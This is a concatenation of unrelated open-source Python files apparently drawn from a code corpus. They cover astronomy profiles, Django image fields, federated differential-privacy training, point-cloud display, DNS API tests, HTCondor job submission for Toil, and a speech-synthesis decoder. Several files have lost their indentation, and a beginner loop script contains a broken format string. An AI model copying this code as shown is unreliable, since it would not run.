y = self.table["profile"].data
x = self.x_ref.value
ax.plot(x, y, **kwargs)
ax.set_xlabel("lon")
ax.set_ylabel("profile")
ax.set_xlim(x.max(), x.min())
return ax
def plot_err(self, ax=None, **kwargs):
"""Plot image profile error as band.
Parameters
----------
ax : `~matplotlib.axes.Axes`
Axes object
**kwargs : dict
Keyword arguments passed to plt.fill_between()
Returns
-------
ax : `~matplotlib.axes.Axes`
Axes object
"""
import matplotlib.pyplot as plt
if ax is None:
ax = plt.gca()
y = self.table["profile"].data
ymin = y - self.table["profile_err"].data
ymax = y + self.table["profile_err"].data
x = self.x_ref.value
# plotting defaults
kwargs.setdefault("alpha", 0.5)
ax.fill_between(x, ymin, ymax, **kwargs)
ax.set_xlabel("x (deg)")
ax.set_ylabel("profile")
return ax
@property
def x_ref(self):
"""Reference x coordinates."""
return self.table["x_ref"].quantity
@property
def x_min(self):
"""Min. x coordinates."""
return self.table["x_min"].quantity
@property
def x_max(self):
"""Max. x coordinates."""
return self.table["x_max"].quantity
@property
def profile(self):
"""Image profile quantity."""
return self.table["profile"].quantity
@property
def profile_err(self):
"""Image profile error quantity."""
try:
return self.table["profile_err"].quantity
except KeyError:
return None
def peek(self, figsize=(8, 4.5), **kwargs):
"""Show image profile and error.
Parameters
----------
**kwargs : dict
Keyword arguments passed to `ImageProfile.plot_profile()`
Returns
-------
ax : `~matplotlib.axes.Axes`
Axes object
"""
import matplotlib.pyplot as plt
fig = plt.figure(figsize=figsize)
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax = self.plot(ax, **kwargs)
if "profile_err" in self.table.colnames:
ax = self.plot_err(ax, color=kwargs.get("c"))
return ax
def normalize(self, mode="peak"):
"""Normalize profile to peak value or integral.
Parameters
----------
mode : ['integral', 'peak']
Normalize image profile so that it integrates to unity ('integral')
or the maximum value corresponds to one ('peak').
Returns
-------
profile : `ImageProfile`
Normalized image profile.
"""
table = self.table.copy()
profile = self.table["profile"]
if mode == "peak":
norm = np.nanmax(profile)
elif mode == "integral":
norm = np.nansum(profile)
else:
raise ValueError(f"Invalid normalization mode: {mode!r}")
table["profile"] /= norm
if "profile_err" in table.colnames:
table["profile_err"] /= norm
return self.__class__(table)
| 2.578125 | 3 |
ABC/abc001-abc050/abc007/b.py | KATO-Hiro/AtCoder | 2 | 5516 | <reponame>KATO-Hiro/AtCoder
# -*- coding: utf-8 -*-
def main():
a = input()
# See:
# https://www.slideshare.net/chokudai/abc007
if a == 'a':
print('-1')
else:
print('a')
if __name__ == '__main__':
main()
| 3.65625 | 4 |
env/lib/python3.8/site-packages/versatileimagefield/mixins.py | crimergio/linux_test | 1 | 5517 | """versatileimagefield Field mixins."""
import os
import re
from .datastructures import FilterLibrary
from .registry import autodiscover, versatileimagefield_registry
from .settings import (
cache,
VERSATILEIMAGEFIELD_CREATE_ON_DEMAND,
VERSATILEIMAGEFIELD_SIZED_DIRNAME,
VERSATILEIMAGEFIELD_FILTERED_DIRNAME
)
from .validators import validate_ppoi
autodiscover()
filter_regex_snippet = r'__({registered_filters})__'.format(
registered_filters='|'.join([
key
for key, filter_cls in versatileimagefield_registry._filter_registry.items()
])
)
sizer_regex_snippet = r'-({registered_sizers})-(\d+)x(\d+)(?:-\d+)?'.format(
registered_sizers='|'.join([
sizer_cls.get_filename_key_regex()
for key, sizer_cls in versatileimagefield_registry._sizedimage_registry.items()
])
)
filter_regex = re.compile(filter_regex_snippet + '$')
sizer_regex = re.compile(sizer_regex_snippet + '$')
filter_and_sizer_regex = re.compile(
filter_regex_snippet + sizer_regex_snippet + '$'
)
class VersatileImageMixIn(object):
"""A mix-in that provides the filtering/sizing API."""
def __init__(self, *args, **kwargs):
"""Construct PPOI and create_on_demand."""
self._create_on_demand = VERSATILEIMAGEFIELD_CREATE_ON_DEMAND
super(VersatileImageMixIn, self).__init__(*args, **kwargs)
# Setting initial ppoi
if self.field.ppoi_field:
instance_ppoi_value = getattr(
self.instance,
self.field.ppoi_field,
(0.5, 0.5)
)
self.ppoi = instance_ppoi_value
else:
self.ppoi = (0.5, 0.5)
@property
def url(self):
"""
Return the appropriate URL.
URL is constructed based on these field conditions:
* If empty (not `self.name`) and a placeholder is defined, the
URL to the placeholder is returned.
* Otherwise, defaults to vanilla ImageFieldFile behavior.
"""
if not self.name and self.field.placeholder_image_name:
return self.storage.url(self.field.placeholder_image_name)
return super(VersatileImageMixIn, self).url
@property
def create_on_demand(self):
"""create_on_demand getter."""
return self._create_on_demand
@create_on_demand.setter
def create_on_demand(self, value):
if not isinstance(value, bool):
raise ValueError(
"`create_on_demand` must be a boolean"
)
else:
self._create_on_demand = value
self.build_filters_and_sizers(self.ppoi, value)
@property
def ppoi(self):
"""Primary Point of Interest (ppoi) getter."""
return self._ppoi_value
@ppoi.setter
def ppoi(self, value):
"""Primary Point of Interest (ppoi) setter."""
ppoi = validate_ppoi(
value,
return_converted_tuple=True
)
if ppoi is not False:
self._ppoi_value = ppoi
self.build_filters_and_sizers(ppoi, self.create_on_demand)
def build_filters_and_sizers(self, ppoi_value, create_on_demand):
"""Build the filters and sizers for a field."""
name = self.name
if not name and self.field.placeholder_image_name:
name = self.field.placeholder_image_name
self.filters = FilterLibrary(
name,
self.storage,
versatileimagefield_registry,
ppoi_value,
create_on_demand
)
for (
attr_name,
sizedimage_cls
) in versatileimagefield_registry._sizedimage_registry.items():
setattr(
self,
attr_name,
sizedimage_cls(
path_to_image=name,
storage=self.storage,
create_on_demand=create_on_demand,
ppoi=ppoi_value
)
)
def get_filtered_root_folder(self):
"""Return the location where filtered images are stored."""
folder, filename = os.path.split(self.name)
return os.path.join(folder, VERSATILEIMAGEFIELD_FILTERED_DIRNAME, '')
def get_sized_root_folder(self):
"""Return the location where sized images are stored."""
folder, filename = os.path.split(self.name)
return os.path.join(VERSATILEIMAGEFIELD_SIZED_DIRNAME, folder, '')
def get_filtered_sized_root_folder(self):
"""Return the location where filtered + sized images are stored."""
sized_root_folder = self.get_sized_root_folder()
return os.path.join(
sized_root_folder,
VERSATILEIMAGEFIELD_FILTERED_DIRNAME
)
def delete_matching_files_from_storage(self, root_folder, regex):
"""
Delete files in `root_folder` which match `regex` before file ext.
Example values:
* root_folder = 'foo/'
* self.name = 'bar.jpg'
* regex = re.compile('-baz')
Result:
* foo/bar-baz.jpg <- Deleted
* foo/bar-biz.jpg <- Not deleted
"""
if not self.name: # pragma: no cover
return
try:
directory_list, file_list = self.storage.listdir(root_folder)
except OSError: # pragma: no cover
pass
else:
folder, filename = os.path.split(self.name)
basename, ext = os.path.splitext(filename)
for f in file_list:
if not f.startswith(basename) or not f.endswith(ext): # pragma: no cover
continue
tag = f[len(basename):-len(ext)]
assert f == basename + tag + ext
if regex.match(tag) is not None:
file_location = os.path.join(root_folder, f)
self.storage.delete(file_location)
cache.delete(
self.storage.url(file_location)
)
print(
"Deleted {file} (created from: {original})".format(
file=os.path.join(root_folder, f),
original=self.name
)
)
def delete_filtered_images(self):
"""Delete all filtered images created from `self.name`."""
self.delete_matching_files_from_storage(
self.get_filtered_root_folder(),
filter_regex
)
def delete_sized_images(self):
"""Delete all sized images created from `self.name`."""
self.delete_matching_files_from_storage(
self.get_sized_root_folder(),
sizer_regex
)
def delete_filtered_sized_images(self):
"""Delete all filtered sized images created from `self.name`."""
self.delete_matching_files_from_storage(
self.get_filtered_sized_root_folder(),
filter_and_sizer_regex
)
def delete_all_created_images(self):
"""Delete all images created from `self.name`."""
self.delete_filtered_images()
self.delete_sized_images()
self.delete_filtered_sized_images()
| 1.992188 | 2 |
differential_privacy/run_federated.py | HanGuo97/federated | 330 | 5518 | # Copyright 2020, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs federated training with differential privacy on various tasks."""
import functools
from absl import app
from absl import flags
from absl import logging
import tensorflow as tf
import tensorflow_federated as tff
from utils import task_utils
from utils import training_utils
from utils import utils_impl
from utils.optimizers import optimizer_utils
with utils_impl.record_hparam_flags() as optimizer_flags:
# Defining optimizer flags
optimizer_utils.define_optimizer_flags('client')
optimizer_utils.define_optimizer_flags('server')
with utils_impl.record_hparam_flags() as shared_flags:
# Federated training hyperparameters
flags.DEFINE_integer('client_epochs_per_round', 1,
'Number of epochs in the client to take per round.')
flags.DEFINE_integer('client_batch_size', 20, 'Batch size on the clients.')
flags.DEFINE_integer('clients_per_round', 10,
'How many clients to sample per round.')
flags.DEFINE_integer('client_datasets_random_seed', 1,
'Random seed for client sampling.')
flags.DEFINE_integer(
'max_elements_per_client', None, 'Maximum number of '
'elements for each training client. If set to None, all '
'available examples are used.')
# Training loop configuration
flags.DEFINE_integer('total_rounds', 200, 'Number of total training rounds.')
flags.DEFINE_string(
      'experiment_name', None, 'The name of this experiment. Will be appended to '
'--root_output_dir to separate experiment results.')
flags.DEFINE_string('root_output_dir', '/tmp/fed_opt/',
'Root directory for writing experiment output.')
flags.DEFINE_integer(
'rounds_per_eval', 1,
'How often to evaluate the global model on the validation dataset.')
flags.DEFINE_integer(
      'num_validation_examples', -1, 'The number of validation '
'examples to use. If set to -1, all available examples '
'are used.')
flags.DEFINE_integer('rounds_per_checkpoint', 50,
'How often to checkpoint the global model.')
with utils_impl.record_hparam_flags() as dp_flags:
# Differential privacy flags
flags.DEFINE_float(
'clip', None, 'Clip value for fixed clipping or initial clip for '
'adaptive clipping. If None, no clipping is used.')
flags.DEFINE_float('noise_multiplier', None,
'Noise multiplier. If None, non-DP aggregator is used.')
flags.DEFINE_float(
'adaptive_clip_learning_rate', None, 'Adaptive clip learning rate. If '
'None, clip adaptation is not used.')
flags.DEFINE_float('target_unclipped_quantile', 0.5,
'Target unclipped quantile.')
flags.DEFINE_boolean('uniform_weighting', False,
'Whether to weigh clients uniformly.')
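# Illustrative invocation (flag values are examples only, not recommended settings):
#   python run_federated.py --task=stackoverflow_word --experiment_name=dp_test \
#     --clip=0.1 --noise_multiplier=1.0 --uniform_weighting=True --total_rounds=100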
# Task specification
with utils_impl.record_hparam_flags() as task_flags:
task_utils.define_task_flags()
FLAGS = flags.FLAGS
def _write_hparam_flags():
"""Returns an ordered dictionary of pertinent hyperparameter flags."""
hparam_dict = utils_impl.lookup_flag_values(shared_flags)
# Update with optimizer flags corresponding to the chosen optimizers.
opt_flag_dict = utils_impl.lookup_flag_values(optimizer_flags)
opt_flag_dict = optimizer_utils.remove_unused_flags('client', opt_flag_dict)
opt_flag_dict = optimizer_utils.remove_unused_flags('server', opt_flag_dict)
hparam_dict.update(opt_flag_dict)
# Update with task flags
task_flag_dict = utils_impl.lookup_flag_values(task_flags)
hparam_dict.update(task_flag_dict)
training_utils.write_hparams_to_csv(hparam_dict, FLAGS.root_output_dir,
FLAGS.experiment_name)
def main(argv):
if len(argv) > 1:
raise app.UsageError('Expected no command-line arguments, '
'got: {}'.format(argv))
client_optimizer_fn = optimizer_utils.create_optimizer_fn_from_flags('client')
server_optimizer_fn = optimizer_utils.create_optimizer_fn_from_flags('server')
train_client_spec = tff.simulation.baselines.ClientSpec(
num_epochs=FLAGS.client_epochs_per_round,
batch_size=FLAGS.client_batch_size,
max_elements=FLAGS.max_elements_per_client)
task = task_utils.create_task_from_flags(train_client_spec)
logging.info('Trainable weights:')
for weight in task.model_fn().trainable_variables:
logging.info('name: %s shape: %s', weight.name, weight.shape)
if FLAGS.uniform_weighting:
client_weighting = tff.learning.ClientWeighting.UNIFORM
elif FLAGS.task == 'shakespeare_character' or FLAGS.task == 'stackoverflow_word':
def client_weighting(local_outputs):
return tf.cast(tf.squeeze(local_outputs['num_tokens']), tf.float32)
else:
client_weighting = None
if FLAGS.noise_multiplier is None:
if FLAGS.uniform_weighting:
aggregation_factory = tff.aggregators.UnweightedMeanFactory()
else:
aggregation_factory = tff.aggregators.MeanFactory()
if FLAGS.clip is not None:
if FLAGS.clip <= 0:
raise ValueError('clip must be positive if clipping is enabled.')
if FLAGS.adaptive_clip_learning_rate is None:
clip = FLAGS.clip
else:
if FLAGS.adaptive_clip_learning_rate <= 0:
raise ValueError('adaptive_clip_learning_rate must be positive if '
'adaptive clipping is enabled.')
clip = tff.aggregators.PrivateQuantileEstimationProcess.no_noise(
initial_estimate=FLAGS.clip,
target_quantile=FLAGS.target_unclipped_quantile,
learning_rate=FLAGS.adaptive_clip_learning_rate)
aggregation_factory = tff.aggregators.clipping_factory(
clip, aggregation_factory)
else:
if not FLAGS.uniform_weighting:
raise ValueError(
'Differential privacy is only implemented for uniform weighting.')
if FLAGS.noise_multiplier <= 0:
raise ValueError('noise_multiplier must be positive if DP is enabled.')
if FLAGS.clip is None or FLAGS.clip <= 0:
raise ValueError('clip must be positive if DP is enabled.')
if FLAGS.adaptive_clip_learning_rate is None:
aggregation_factory = tff.aggregators.DifferentiallyPrivateFactory.gaussian_fixed(
noise_multiplier=FLAGS.noise_multiplier,
clients_per_round=FLAGS.clients_per_round,
clip=FLAGS.clip)
else:
if FLAGS.adaptive_clip_learning_rate <= 0:
raise ValueError('adaptive_clip_learning_rate must be positive if '
'adaptive clipping is enabled.')
aggregation_factory = tff.aggregators.DifferentiallyPrivateFactory.gaussian_adaptive(
noise_multiplier=FLAGS.noise_multiplier,
clients_per_round=FLAGS.clients_per_round,
initial_l2_norm_clip=FLAGS.clip,
target_unclipped_quantile=FLAGS.target_unclipped_quantile,
learning_rate=FLAGS.adaptive_clip_learning_rate)
iterative_process = tff.learning.build_federated_averaging_process(
model_fn=task.model_fn,
server_optimizer_fn=server_optimizer_fn,
client_weighting=client_weighting,
client_optimizer_fn=client_optimizer_fn,
model_update_aggregation_factory=aggregation_factory)
train_data = task.datasets.train_data.preprocess(
task.datasets.train_preprocess_fn)
training_process = (
tff.simulation.compose_dataset_computation_with_iterative_process(
train_data.dataset_computation, iterative_process))
training_selection_fn = functools.partial(
tff.simulation.build_uniform_sampling_fn(
train_data.client_ids, random_seed=FLAGS.client_datasets_random_seed),
size=FLAGS.clients_per_round)
test_data = task.datasets.get_centralized_test_data()
validation_data = test_data.take(FLAGS.num_validation_examples)
federated_eval = tff.learning.build_federated_evaluation(task.model_fn)
evaluation_selection_fn = lambda round_num: [validation_data]
def evaluation_fn(state, evaluation_data):
return federated_eval(state.model, evaluation_data)
program_state_manager, metrics_managers = training_utils.create_managers(
FLAGS.root_output_dir, FLAGS.experiment_name)
_write_hparam_flags()
state = tff.simulation.run_training_process(
training_process=training_process,
training_selection_fn=training_selection_fn,
total_rounds=FLAGS.total_rounds,
evaluation_fn=evaluation_fn,
evaluation_selection_fn=evaluation_selection_fn,
rounds_per_evaluation=FLAGS.rounds_per_eval,
program_state_manager=program_state_manager,
rounds_per_saving_program_state=FLAGS.rounds_per_checkpoint,
metrics_managers=metrics_managers)
test_metrics = federated_eval(state.model, [test_data])
for metrics_manager in metrics_managers:
metrics_manager.release(test_metrics, FLAGS.total_rounds + 1)
if __name__ == '__main__':
app.run(main)
| 1.796875 | 2 |
waymo_kitti_converter/tools/visual_point_cloud.py | anhvth/Pseudo_Lidar_V2 | 0 | 5519 | import open3d as o3d
import numpy as np
pc_load_pathname = '/home/caizhongang/github/waymo_kitti_converter/007283-000.bin'
pc = np.fromfile(pc_load_pathname, dtype=np.float32).reshape(-1, 3)
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(pc)
axis = o3d.geometry.TriangleMesh.create_coordinate_frame(size=1, origin=[0,0,0])
visual = [pcd, axis]
o3d.visualization.draw_geometries(visual)
| 2.15625 | 2 |
designate-8.0.0/designate/tests/test_api/test_v2/test_limits.py | scottwedge/OpenStack-Stein | 145 | 5520 | <reponame>scottwedge/OpenStack-Stein
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from designate.tests.test_api.test_v2 import ApiV2TestCase
class ApiV2LimitsTest(ApiV2TestCase):
def test_get_limits(self):
response = self.client.get('/limits/')
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('max_zones', response.json)
self.assertIn('max_zone_records', response.json)
self.assertIn('max_zone_recordsets',
response.json)
self.assertIn('max_recordset_records',
response.json)
self.assertIn('min_ttl', response.json)
self.assertIn('max_zone_name_length',
response.json)
self.assertIn('max_recordset_name_length',
response.json)
self.assertIn('max_page_limit',
response.json)
absolutelimits = response.json
self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones'])
self.assertEqual(cfg.CONF.quota_zone_records,
absolutelimits['max_zone_recordsets'])
self.assertEqual(cfg.CONF['service:central'].min_ttl,
absolutelimits['min_ttl'])
self.assertEqual(cfg.CONF['service:central'].max_zone_name_len,
absolutelimits['max_zone_name_length'])
self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len,
absolutelimits['max_recordset_name_length'])
self.assertEqual(cfg.CONF['service:api'].max_limit_v2,
absolutelimits['max_page_limit'])
| 2.140625 | 2 |
pythonAnimations/pyOpenGLChess/engineDirectory/oglc-env/lib/python2.7/site-packages/OpenGLContext/scenegraph/nodepath.py | alexus37/AugmentedRealityChess | 1 | 5521 | """node-path implementation for OpenGLContext
"""
from vrml.vrml97 import nodepath, nodetypes
from vrml.cache import CACHE
from OpenGLContext import quaternion
from OpenGL.GL import glMultMatrixf
class _NodePath( object ):
"""OpenGLContext-specific node-path class
At the moment this only adds a single method,
transform() which traverses the path, calling
transform() for each Transforming node which
has a transform method.
"""
__slots__ = ()
def transform( self, mode=None, translate=1, scale=1, rotate=1 ):
"""For each Transforming node, do OpenGL transform
Does _not_ push-pop matrices, so do that before
if you want to save your current matrix. This method
is useful primarily for storing paths to, for instance,
bindable nodes, where you want to be able to rapidly
transform down to the node, without needing a full
traversal of the scenegraph.
"""
matrix = self.transformMatrix(
translate=translate, scale=scale, rotate=rotate
)
glMultMatrixf(
matrix
)
def quaternion( self ):
"""Get summary quaternion for all rotations in stack"""
nodes = [
node
for node in self
if (
isinstance(node, nodetypes.Transforming) and
hasattr( node, "orientation")
)
]
q = quaternion.Quaternion()
for node in nodes:
q = q * quaternion.fromXYZR( *node.orientation )
return q
class NodePath( _NodePath, nodepath.NodePath ):
pass
class WeakNodePath( _NodePath, nodepath.WeakNodePath ):
pass
| 2.640625 | 3 |
part01_basic/for_while_loop.py | ApprenticeOne/python_learn | 0 | 5522 | import random
from math import sqrt
sum = 0
for x in range(101):
sum += x
print(sum)
'''
range(101)      -> 0-100, 101 numbers in total
range(1,101)    -> 1-100
range(1,101,2)  -> odd numbers from 1 to 100, step 2
range(100,0,-2) -> even numbers from 100 down to 2, step -2
'''
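# For example, list(range(1, 10, 2)) == [1, 3, 5, 7, 9]
# and list(range(10, 0, -2)) == [10, 8, 6, 4, 2].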
sum = 0
for x in range(100, 0, -2):
sum += x
print(sum)
# while
# random integer between 0 and 100
answer = random.randint(0, 100)
count = 0
while True:
count += 1
number = int(input("Please enter the number: "))
if number < answer:
print("more larger")
elif number > answer:
print("more smaller")
    else:
        print("right")
        break
print('you got d% times to get right answer' % count)
for i in range(1, 10):
for j in range(1, i + 1):
print('%d*%d=%d' % (i, j, i * j), end='\t')
print()
# Read a positive integer and check whether it is prime
num = int(input('Please enter a positive integer: '))
end = int(sqrt(num))
is_prime = True
# Why stop at end: if the number has a factor smaller than sqrt(num),
# it must also have a matching factor larger than sqrt(num)
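# e.g. 36 = 4 * 9: the factor 4 (< 6) pairs with 9 (> 6), so testing divisors
# up to sqrt(36) = 6 is sufficient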
for x in range(2, end + 1):
if num % x == 0:
is_prime = False
break
if is_prime and num != 1:
    print('%d is prime' % num)
else:
    print('%d is not prime' % num)
| 3.78125 | 4 |
src/toil/batchSystems/htcondor.py | ElementGenomicsInc/toil | 2 | 5523 | <filename>src/toil/batchSystems/htcondor.py
# Copyright (C) 2018, HTCondor Team, Computer Sciences Department,
# University of Wisconsin-Madison, WI.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from builtins import str
import sys
import os
import logging
import time
import math
from toil.batchSystems.abstractGridEngineBatchSystem import AbstractGridEngineBatchSystem
import htcondor
import classad
logger = logging.getLogger(__name__)
class HTCondorBatchSystem(AbstractGridEngineBatchSystem):
# When using HTCondor, the Schedd handles scheduling
class Worker(AbstractGridEngineBatchSystem.Worker):
# Override the createJobs method so that we can use htcondor.Submit objects
# and so that we can get disk allocation requests and ceil the CPU request.
def createJobs(self, newJob):
activity = False
if newJob is not None:
self.waitingJobs.append(newJob)
# Queue jobs as necessary:
while len(self.waitingJobs) > 0:
activity = True
jobID, cpu, memory, disk, jobName, command = self.waitingJobs.pop(0)
# Prepare the htcondor.Submit object
submitObj = self.prepareSubmission(cpu, memory, disk, jobID, jobName, command)
logger.debug("Submitting %r", submitObj)
# Submit job and get batch system ID (i.e. the ClusterId)
batchJobID = self.submitJob(submitObj)
logger.debug("Submitted job %s", str(batchJobID))
# Store dict for mapping Toil job ID to batch job ID
# TODO: Note that this currently stores a tuple of (batch system
# ID, Task), but the second value is None by default and doesn't
# seem to be used
self.batchJobIDs[jobID] = (batchJobID, None)
# Add to queue of queued ("running") jobs
self.runningJobs.add(jobID)
# Add to allocated resources
self.allocatedCpus[jobID] = int(math.ceil(cpu))
return activity
def prepareSubmission(self, cpu, memory, disk, jobID, jobName, command):
# Convert resource requests
cpu = int(math.ceil(cpu)) # integer CPUs
memory = float(memory)/1024 # memory in KB
disk = float(disk)/1024 # disk in KB
# Workaround for HTCondor Python bindings Unicode conversion bug
command = command.encode('utf-8')
# Execute the entire command as /bin/sh -c "command"
# TODO: Transfer the jobStore directory if using a local file store with a relative path.
submit_parameters = {
'executable': '/bin/sh',
'transfer_executable': 'False',
'arguments': '''"-c '{0}'"'''.format(command),
'environment': self.getEnvString(),
'request_cpus': '{0}'.format(cpu),
'request_memory': '{0:.3f}KB'.format(memory),
'request_disk': '{0:.3f}KB'.format(disk),
'leave_in_queue': '(JobStatus == 4)',
'+IsToilJob': 'True',
'+ToilJobID': '{0}'.format(jobID),
'+ToilJobName': '"{0}"'.format(jobName),
'+ToilJobKilled': 'False',
}
# Return the Submit object
return htcondor.Submit(submit_parameters)
def submitJob(self, submitObj):
# Queue the job using a Schedd transaction
schedd = self.connectSchedd()
with schedd.transaction() as txn:
batchJobID = submitObj.queue(txn)
# Return the ClusterId
return batchJobID
def getRunningJobIDs(self):
# Get all Toil jobs that are running
requirements = '(JobStatus == 2) && (IsToilJob)'
projection = ['ClusterId', 'ToilJobID', 'EnteredCurrentStatus']
schedd = self.connectSchedd()
ads = schedd.xquery(requirements = requirements,
projection = projection)
# Only consider the Toil jobs that are part of this workflow
batchJobIDs = [batchJobID for (batchJobID, task) in self.batchJobIDs.values()]
job_runtimes = {}
for ad in ads:
batchJobID = int(ad['ClusterId'])
jobID = int(ad['ToilJobID'])
if not (batchJobID in batchJobIDs):
continue
# HTCondor stores the start of the runtime as a Unix timestamp
runtime = time.time() - ad['EnteredCurrentStatus']
job_runtimes[jobID] = runtime
return job_runtimes
def killJob(self, jobID):
batchJobID = self.batchJobIDs[jobID][0]
logger.debug("Killing HTCondor job {0}".format(batchJobID))
# Set the job to be killed when its exit status is checked
schedd = self.connectSchedd()
job_spec = '(ClusterId == {0})'.format(batchJobID)
schedd.edit(job_spec, 'ToilJobKilled', 'True')
def getJobExitCode(self, batchJobID):
logger.debug("Getting exit code for HTCondor job {0}".format(batchJobID))
status = {
1: 'Idle',
2: 'Running',
3: 'Removed',
4: 'Completed',
5: 'Held',
6: 'Transferring Output',
7: 'Suspended'
}
requirements = '(ClusterId == {0})'.format(batchJobID)
projection = ['JobStatus', 'ToilJobKilled', 'ExitCode',
'HoldReason', 'HoldReasonSubCode']
schedd = self.connectSchedd()
ads = schedd.xquery(requirements = requirements, projection = projection)
# Make sure a ClassAd was returned
try:
ad = ads.next()
except StopIteration:
logger.error(
"No HTCondor ads returned using constraint: {0}".format(requirements))
raise
# Make sure only one ClassAd was returned
try:
ads.next()
except StopIteration:
pass
else:
logger.warning(
"Multiple HTCondor ads returned using constraint: {0}".format(requirements))
if ad['ToilJobKilled']:
logger.debug("HTCondor job {0} was killed by Toil".format(batchJobID))
# Remove the job from the Schedd and return 1
job_spec = 'ClusterId == {0}'.format(batchJobID)
schedd.act(htcondor.JobAction.Remove, job_spec)
return 1
elif status[ad['JobStatus']] == 'Completed':
logger.debug("HTCondor job {0} completed with exit code {1}".format(
batchJobID, ad['ExitCode']))
# Remove the job from the Schedd and return its exit code
job_spec = 'ClusterId == {0}'.format(batchJobID)
schedd.act(htcondor.JobAction.Remove, job_spec)
return int(ad['ExitCode'])
elif status[ad['JobStatus']] == 'Held':
logger.error("HTCondor job {0} was held: '{1} (sub code {2})'".format(
batchJobID, ad['HoldReason'], ad['HoldReasonSubCode']))
# Remove the job from the Schedd and return 1
job_spec = 'ClusterId == {0}'.format(batchJobID)
schedd.act(htcondor.JobAction.Remove, job_spec)
return 1
else: # Job still running or idle or doing something else
logger.debug("HTCondor job {0} has not completed (Status: {1})".format(
batchJobID, status[ad['JobStatus']]))
return None
"""
Implementation-specific helper methods
"""
def connectSchedd(self):
'''Connect to HTCondor Schedd and return a Schedd object'''
condor_host = os.getenv('TOIL_HTCONDOR_COLLECTOR')
schedd_name = os.getenv('TOIL_HTCONDOR_SCHEDD')
# If TOIL_HTCONDOR_ variables are set, use them to find the Schedd
if condor_host and schedd_name:
logger.debug(
"Connecting to HTCondor Schedd {0} using Collector at {1}".format(
schedd_name, condor_host))
try:
schedd_ad = htcondor.Collector(condor_host).locate(
htcondor.DaemonTypes.Schedd, schedd_name)
except IOError:
logger.error(
"Could not connect to HTCondor Collector at {0}".format(condor_host))
raise
except ValueError:
logger.error(
"Could not find HTCondor Schedd with name {0}".format(schedd_name))
raise
else:
schedd = htcondor.Schedd(schedd_ad)
# Otherwise assume the Schedd is on the local machine
else:
logger.debug("Connecting to HTCondor Schedd on local machine")
schedd = htcondor.Schedd()
# Ping the Schedd to make sure it's there and responding
try:
schedd.xquery(limit = 0)
except RuntimeError:
logger.error("Could not connect to HTCondor Schedd")
raise
return schedd
def getEnvString(self):
'''Build an environment string that a HTCondor Submit object can use.
For examples of valid strings, see:
http://research.cs.wisc.edu/htcondor/manual/current/condor_submit.html#man-condor-submit-environment
'''
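            # Illustrative example (values are hypothetical): an environment of
            # {'PATH': '/usr/bin', 'MSG': "it's"} would be rendered as
            # "PATH='/usr/bin' MSG='it''s'" (with the whole string double-quoted),
            # following the quoting rules described above.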
env_items = []
if self.boss.environment:
for key, value in self.boss.environment.items():
# Each variable should be in the form of <key>='<value>'
env_string = key + "="
# The entire value should be encapsulated in single quotes
# Quote marks (single or double) that are part of the value should be duplicated
env_string += "'" + value.replace("'", "''").replace('"', '""') + "'"
env_items.append(env_string)
# The entire string should be encapsulated in double quotes
# Each variable should be separated by a single space
return '"' + ' '.join(env_items) + '"'
# Override the issueBatchJob method so HTCondor can be given the disk request
def issueBatchJob(self, jobNode):
# Avoid submitting internal jobs to the batch queue, handle locally
localID = self.handleLocalJob(jobNode)
if localID:
return localID
else:
self.checkResourceRequest(jobNode.memory, jobNode.cores, jobNode.disk)
jobID = self.getNextJobID()
self.currentJobs.add(jobID)
# Add the jobNode.disk and jobNode.jobName to the job tuple
self.newJobsQueue.put((jobID, jobNode.cores, jobNode.memory, jobNode.disk, jobNode.jobName, jobNode.command))
logger.debug("Issued the job command: %s with job id: %s ", jobNode.command, str(jobID))
return jobID
@classmethod
def obtainSystemConstants(cls):
# Since it's not always clear what the max cpus and max memory available
# in an HTCondor slot might be, use some reasonable constants for now.
# TODO: Use a htcondor.Collector().query() to determine reasonable values.
max_cpu = 4
max_mem = 4e9
return max_cpu, max_mem
| 2.140625 | 2 |
paddlespeech/t2s/modules/tacotron2/decoder.py | alanlv/PaddleSpeech | 0 | 5524 | <gh_stars>0
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Modified from espnet(https://github.com/espnet/espnet)
"""Tacotron2 decoder related modules."""
import paddle
import paddle.nn.functional as F
import six
from paddle import nn
from paddlespeech.t2s.modules.tacotron2.attentions import AttForwardTA
class Prenet(nn.Layer):
"""Prenet module for decoder of Spectrogram prediction network.
This is a module of Prenet in the decoder of Spectrogram prediction network,
    which is described in `Natural TTS
    Synthesis by Conditioning WaveNet on Mel Spectrogram Predictions`_.
    The Prenet performs a nonlinear conversion
